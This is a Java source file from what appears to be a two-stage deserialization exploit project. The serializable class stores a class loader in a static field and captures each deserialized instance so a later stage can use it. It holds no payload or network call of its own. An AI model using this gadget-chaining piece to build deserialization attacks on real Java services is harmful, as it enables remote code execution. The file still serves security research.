twostage/src-exploit/x/ClassLoaderHolder.java
package x;
import java.io.IOException;
import java.io.ObjectInputStream;
import java.io.Serializable;
/**
* This is needed to catch the previously deserialized
* event for later usage.
*/
public class ClassLoaderHolder implements Serializable {
private static final long serialVersionUID = -3609966585057367355L;
public static ClassLoaderHolder lastInstance;
public ClassLoaderHolder(SerializableClassLoader object) {
ClassLoaderHolder.object = object;
}
public static SerializableClassLoader object;
private void readObject(ObjectInputStream in) throws IOException, ClassNotFoundException {
in.defaultReadObject();
lastInstance = this;
}
}